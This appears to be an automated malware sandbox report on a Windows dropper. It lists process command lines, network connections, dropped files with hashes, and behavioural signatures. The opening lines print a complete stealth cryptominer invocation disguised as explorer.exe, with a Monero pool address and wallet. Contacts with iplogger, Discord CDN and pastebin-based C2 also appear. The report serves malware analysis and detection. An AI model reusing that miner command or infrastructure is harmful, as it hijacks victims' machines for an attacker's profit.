C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.raw/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CFvMg9MgC241sftmft2lYvgrdUwd08ilNkQ/lCe6+NW" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | whealclothing.xyz | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | my-all-group.bar | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | m525-blockchain31432.bar | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.212.227:80 | c.pki.goog | tcp |
| NL | 45.9.20.156:80 | tcp | |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.independent.co.uk | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 151.101.1.91:443 | www.independent.co.uk | tcp |
| US | 8.8.8.8:53 | fobe1.com | udp |
| US | 8.8.8.8:53 | 91.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rss.nytimes.com | udp |
| US | 151.101.1.164:443 | rss.nytimes.com | tcp |
| US | 8.8.8.8:53 | 164.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| GB | 142.250.187.238:80 | www.google-analytics.com | tcp |
| US | 8.8.8.8:53 | s3.tebi.io | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| DE | 195.201.169.32:443 | s3.tebi.io | tcp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mas.to | udp |
| US | 104.21.11.154:443 | mas.to | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.201.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.11.21.104.in-addr.arpa | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| NL | 45.9.20.156:80 | tcp | |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 72.84.118.132:8080 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| NL | 45.9.20.156:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| FR | 163.172.171.111:14433 | xmr-eu2.nanopool.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 111.171.172.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| PL | 54.37.137.114:14433 | xmr-eu1.nanopool.org | tcp |
| NL | 45.9.20.156:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.137.37.54.in-addr.arpa | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 45.9.20.156:80 | tcp | |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 45.9.20.156:80 | tcp | |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 27.178.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
Files
memory/3368-0-0x0000000074DBE000-0x0000000074DBF000-memory.dmp
memory/3368-1-0x00000000003A0000-0x0000000000AAC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
| MD5 | a97c8c767343939c63ab2c3a7f9186fd |
| SHA1 | 5a8582d13af999922c1ad75db58950ad9523f8dc |
| SHA256 | c528db4c190ac29c57c7810b26e9bf5c6e78b2ebbdbe64d81cfe57289a537768 |
| SHA512 | 268bb93a76760e4f8a3d3229cdc5dec5930de46d1fdd85950015f68dab403f615d3e5854d04c72397c990cfd5525f233920c540adad50ef1e2696426ec37b599 |
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
| MD5 | 7b1ff60b0ba26d132c74535a641a0e02 |
| SHA1 | 0180b514cb32ae43fcefda0863a96f1f79a51b33 |
| SHA256 | accb11ccb1692a5e771981a5659d68c8adc3e225f476ca3387b57d818381ed1b |
| SHA512 | 3dbe1669e6f0f2c498a4276ef4d31ccf872bc2fcd4f1a1c282e6caf48d6cbd12d8685a05a9f43e3eef9fff8ba143ad1b14227f6c1a4a4263e242b5f8716a1034 |
C:\Users\Admin\AppData\Local\Temp\inst2.exe
| MD5 | d57afeb2944b37345cda2e47db2ca5e3 |
| SHA1 | d3c8c74ae71450a59f005501d537bdb2bdd456ee |
| SHA256 | 06fa55c63ca655c7d67ac59fc8276d086bc39dbe727ef7de80fc42dcd575711e |
| SHA512 | d9ece7d17c4e275f85a4bc58128ef67abc33b19cc77425e5fd2f896a03975469432fa9ec8f05eeefe3ac5062c1fb842702cc80a4eb97b1737597b6dc3dde94e8 |
C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
| MD5 | 9dabbd84d79a0330f7635748177a2d93 |
| SHA1 | 73a4e520d772e4260651cb20b61ba4cb9a29635a |
| SHA256 | a6e4be06d34448f4efa8655a3ae6e294c98ae4cb42f7c3da3be06b419fa8389d |
| SHA512 | 020114ba08ccb7ad7934e2046d2b61ebd1b006b8c31194f2cfb49ff4397f4db35dc67c8191552346d04709dee4871a13797cf284ef543e7280bc390a6746a314 |
C:\Users\Admin\AppData\Local\Temp\4.exe
| MD5 | 1581dee9ad745f69413381da2c06f68b |
| SHA1 | 79926e1bbcb97f41e63efcba2ab696259fdb98ce |
| SHA256 | f8cb7c4bf0b265fcbed502ab4abb3dfa6c0488c0d53c68742582df26bbd6bf0e |
| SHA512 | 9ea8f526304bf123e4f50cb94468d01287576edafcbc25046c9d5094d8990dee38a9309d00462239a8c73f6b3d288354dd6fcfab29ab4fe60db6acde500283ff |
memory/2904-58-0x00007FFC0EC10000-0x00007FFC0F6D1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
| MD5 | 199ac38e98448f915974878daeac59d5 |
| SHA1 | ec36afe8b99d254b6983009930f70d51232be57e |
| SHA256 | b3f30bbad084a12ea28f3c21157083b1e0d30ca57e0da4e678d8567b5eb79dcf |
| SHA512 | 61af8746f073870dd632adb7cca4cec0f4772ea5737b25da1cce1f7104a5826019ea72ba84174b7758b73b2cd3fd8320c3acffd1bd5f96704d4061323413867e |
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | a7703240793e447ec11f535e808d2096 |
| SHA1 | 913af985f540dab68be0cdf999f6d7cb52d5be96 |
| SHA256 | 6a17ebf5da6aa3a1f4813e5f46fdd5d19d026bcfac91f232359f98e43df3c38f |
| SHA512 | 57bdcdfcfa11f6b5bf4149be0fee0444fcf67ccececf1009b166b17b7dce30da1a472f1890736186f4ef76e02ed23cc0dd2a41dc9bff94218a059832d4b5c69e |
memory/3896-57-0x00000000001E0000-0x00000000001E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
| MD5 | dd3f5335f760b949760b02aac1187694 |
| SHA1 | f53535bb3093caef66890688e6c214bcb4c51ef9 |
| SHA256 | 90206625829c37a60ab736cfd7a8ff46f89524123b3246eabeaa77a2126bba26 |
| SHA512 | e715b69ca632f51c449a415ef831ed0d7e0160af20a3f79b09cb31bdce8920697c30c5f625851e9418bc087145b7b16deea7cc57c159c331350f1c88e7785004 |
C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
C:\Users\Admin\AppData\Local\Temp\8.exe
| MD5 | 360e4cdd67c04428d4a9b9b59d352584 |
| SHA1 | de633409edc357f21da340992cbb035350001254 |
| SHA256 | 01a005463e33fb90c1b77e0fcee36f5e7856fe6868313df3c1fe123fe4c1e1a8 |
| SHA512 | e0c9056943d7e70f5e506696ce9b0236d083fe6cb08fb7511355fac380da3b56fad552789053d58de06b5e980fd38319b865be962b09e1d3f2f46a84ef177084 |
C:\Users\Admin\AppData\Local\Temp\is-OR5S1.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
| MD5 | f7f7ab4f0a4d1c8d127a1c6bb4c0ea6e |
| SHA1 | d7462d88f1fb9904fe3f1e937e2ebc0809607f8a |
| SHA256 | f564d99d0ce406b1ca653ad2d3c40d6d4c6d9304729fd47a22bb6157be6294a6 |
| SHA512 | 95e156b95132d6a7df5c15ba7f7d0b6d683a16e46c83716090a83a4cf1016f5a9e45ec45026f05287f55596bd669fac5b1873d89779795011ff7bd4484aab7e2 |
memory/2904-128-0x00007FFC0EC10000-0x00007FFC0F6D1000-memory.dmp
memory/2672-163-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/3028-171-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Jonba.exe
| MD5 | 3434b3e59d0dc8d25ff3e83ced5d6f87 |
| SHA1 | 1cfc6af2e22fc55e8bcbce2cbe0ea572cff11d8f |
| SHA256 | f2201a75165335d71b3f303fb46db6b8e6e160cba924bc02b2409da5c8c83b40 |
| SHA512 | 6f7850598937f930a6732a1e713ebe47cc716fe9e32a68623378c8143c57da1f51f4af97f6886bce3f48b8a04b0bd540839eee23ca0926f6bf44c2f5af12980a |
memory/1992-184-0x0000000000350000-0x0000000000358000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-6NVNL.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Local\Temp\nsu9E36.tmp\INetC.dll
| MD5 | 2b342079303895c50af8040a91f30f71 |
| SHA1 | b11335e1cb8356d9c337cb89fe81d669a69de17e |
| SHA256 | 2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f |
| SHA512 | 550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47 |
C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
| MD5 | 89d1bd67214042bde02749afdc91b85f |
| SHA1 | bd3b9b45fecb02a8d38a3f2dab7de14a3e4f8ea4 |
| SHA256 | 4672ca322e9d03b30223452f9d9be6e78d957ef47fc046fc60a1fffc1edad1e0 |
| SHA512 | bacf183ae91cd2f8521f5ff376a2f004b2222738b5ffe2c69d623b33266186ccc7036fb255591af1d3b7f1003376950486e42cb1dc202a60ffd597a7227a15ad |
C:\Users\Admin\AppData\Local\Temp\nsu9E36.tmp\System.dll
| MD5 | fbe295e5a1acfbd0a6271898f885fe6a |
| SHA1 | d6d205922e61635472efb13c2bb92c9ac6cb96da |
| SHA256 | a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1 |
| SHA512 | 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06 |
memory/5048-211-0x00000000031A0000-0x000000000321C000-memory.dmp
memory/2108-145-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4060-116-0x0000000000CE0000-0x0000000000CE8000-memory.dmp
memory/3028-81-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2956-59-0x00000000004E0000-0x000000000052A000-memory.dmp
memory/1200-55-0x0000000000010000-0x000000000005A000-memory.dmp
memory/1200-52-0x0000000000010000-0x000000000005A000-memory.dmp
memory/1200-48-0x0000000000010000-0x000000000005A000-memory.dmp
memory/2904-26-0x0000000002BC0000-0x0000000002BC6000-memory.dmp
memory/2904-15-0x0000000000B50000-0x0000000000B6A000-memory.dmp
memory/2904-13-0x00007FFC0EC13000-0x00007FFC0EC15000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8
| MD5 | 971c514f84bba0785f80aa1c23edfd79 |
| SHA1 | 732acea710a87530c6b08ecdf32a110d254a54c8 |
| SHA256 | f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895 |
| SHA512 | 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
| MD5 | a301ebde2b21398e796398cd7c973296 |
| SHA1 | 4e417ba63cde94f776843e1208013b537571e9a8 |
| SHA256 | 602099bed23abfc1c5f2aea2592a2bc2a7d6c3e911b984e32c16dfc30db1a04f |
| SHA512 | 99b8696cc1f1f7a12706cc71fae6601ac64bca2f772e4ffac7972e3529204c75e1dd6f7537f35849ca6b6ec7813c8f633c03dd41fd20d1aa038dcbc17f27ddb4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| MD5 | 67e486b2f148a3fca863728242b6273e |
| SHA1 | 452a84c183d7ea5b7c015b597e94af8eef66d44a |
| SHA256 | facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb |
| SHA512 | d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| MD5 | 84b7af9d76223783b896008964b883ce |
| SHA1 | d9d89432969372eb5fb7aba6c710de9c67f47245 |
| SHA256 | 4c3dace7ea81bd11cf97b84357dcfb49533fbfc80f2f0cc3e617491e41722088 |
| SHA512 | cd26c958313b158fd146f9dcd79b1fe8aae0c7d2a8220373b35454fd8889e91d8425be98d6d470735996fae8c8848afa92027f86941e8faca1349eb97d317c01 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\WcWfz1Tn.MJ
| MD5 | e1caa9cc3b8bd60f12093059981f3679 |
| SHA1 | f35d8b851dc0222ae8294b28bd7dee339cc0589b |
| SHA256 | 254b6e6f43b2707ac107664b163ba074051b0534aafa8faf85a1760299182565 |
| SHA512 | 23f3fa616c1a96acd9a781d833a69ac37a9989dc5605396ecde41beae971b287bc963ea8020c56d92034e7e284c37639280650e1674864707ba859ad5815cdfa |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\MyBa.V
| MD5 | 51424c68f5ff16380b95f917c7b78703 |
| SHA1 | 70aa922f08680c02918c765daf8d0469e5cd9e50 |
| SHA256 | 065f5b48408abb0260d68775e6db36136c8ac2bd7c8a1168613cc5cb8825d315 |
| SHA512 | c7510a9555402d64665bcbce661eb54c1bcbb20095c084036d8af625de9d0bf93cb33e93cbc9b6efbc73f9080ef7052dcbc35fb8d44ccf56fb2db8af933e06af |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\1w8lBDVH.aou
| MD5 | 112b8c9fa0419875f26ca7b592155f2b |
| SHA1 | 0b407062b6e843801282c2dc0c3749f697a67300 |
| SHA256 | 95ae984c19dbf91919296efb398aaf700605910a28abe9288c7639c7d9223202 |
| SHA512 | a71e187dbc18c2d7cd21b1e856ee7d58e230b801758ed6a2205e8dacdc8235a09111014cff3171ea82e8942251508ada57eefdbcbc13daddbfbe30eddc29dad8 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\9Bu~.w
| MD5 | 8b4e06aede42785b01c3cdf3f0883da6 |
| SHA1 | 664fdc12cb0141ffd68b289eaaf70ae4c5163a5a |
| SHA256 | 8a8d67872f0bc6e6669f7396a84b879d12882ea495467b09b6613edfc4108c42 |
| SHA512 | 7b6a20e41365c546f1aa5a84964b36fc4cedd194754d1f09cfdadf822f4141d037067811ca62a7d2da23ec1e332943cb828d4f771308fdfa79327cb3fb6f2c82 |
memory/5048-254-0x0000000000400000-0x0000000002F74000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX1\hKS2IU.1Q
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
memory/2008-261-0x0000000002AF0000-0x0000000003AF0000-memory.dmp
memory/1200-262-0x0000000000BB0000-0x0000000000BBC000-memory.dmp
memory/2008-263-0x000000002D8F0000-0x000000002D996000-memory.dmp
memory/2008-267-0x000000002D9A0000-0x000000002DA33000-memory.dmp
memory/2008-264-0x000000002D9A0000-0x000000002DA33000-memory.dmp
memory/2108-268-0x0000000000400000-0x0000000000414000-memory.dmp
memory/3448-269-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2008-270-0x0000000002AF0000-0x0000000003AF0000-memory.dmp
memory/3660-278-0x000001CE77E60000-0x000001CE78080000-memory.dmp
memory/3660-279-0x000001CE7AA80000-0x000001CE7ACA0000-memory.dmp
memory/3660-280-0x000001CE79EE0000-0x000001CE79EF2000-memory.dmp
memory/2008-281-0x000000002D9A0000-0x000000002DA33000-memory.dmp
memory/2008-282-0x000000002DA40000-0x000000002E8A6000-memory.dmp
memory/2008-283-0x000000002E8B0000-0x000000002E93D000-memory.dmp
memory/2008-284-0x000000002E940000-0x000000002E9C8000-memory.dmp
memory/2008-285-0x000000002E940000-0x000000002E9C8000-memory.dmp
memory/2008-287-0x000000002E940000-0x000000002E9C8000-memory.dmp
memory/2008-288-0x0000000000A30000-0x0000000000A33000-memory.dmp
memory/2008-289-0x0000000000A40000-0x0000000000A45000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\e58a3dc.exe
| MD5 | a014b8961283f1e07d7f31ecdd7db62f |
| SHA1 | 70714b6dc8abbaa5d1cba38c047ea3a4ec6ac065 |
| SHA256 | 21ce0cdfaeb6d7f58bd17545be18f9cd3ac2476939112872d1a05d3164098f89 |
| SHA512 | bd0bb1405c7d74c941c5db0d3fd5fbe93544055f79db5076ab293c868568873df98f902c343096ff765be6c4911435617aab2ada15591dfc90606b5630d64869 |
memory/2944-321-0x0000000000F60000-0x0000000000F68000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
| MD5 | b245679121623b152bea5562c173ba11 |
| SHA1 | 47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d |
| SHA256 | 73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f |
| SHA512 | 75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c |
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 816520bddbb9cd95a5904ba5c6626989 |
| SHA1 | d6aca0489429c82eab0f5e213f1ca93648a36eb2 |
| SHA256 | 8877b12798309300f6f18ac44e2c4770076c152b5ba36f17b8bf94338adc178a |
| SHA512 | 2db4fb133d24d8cd8905c42e8affab1efd322efa740ba8381de4a0f610a2492a78dfc42761d85d7df13334938da7ddd0fe95a6066ff3d40f03c2f71f2f5660c3 |
memory/4556-336-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4556-339-0x0000000002E20000-0x0000000002E40000-memory.dmp
memory/4556-338-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4556-341-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4556-340-0x0000000140000000-0x0000000140786000-memory.dmp
memory/3468-357-0x000002579D180000-0x000002579D186000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
150s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
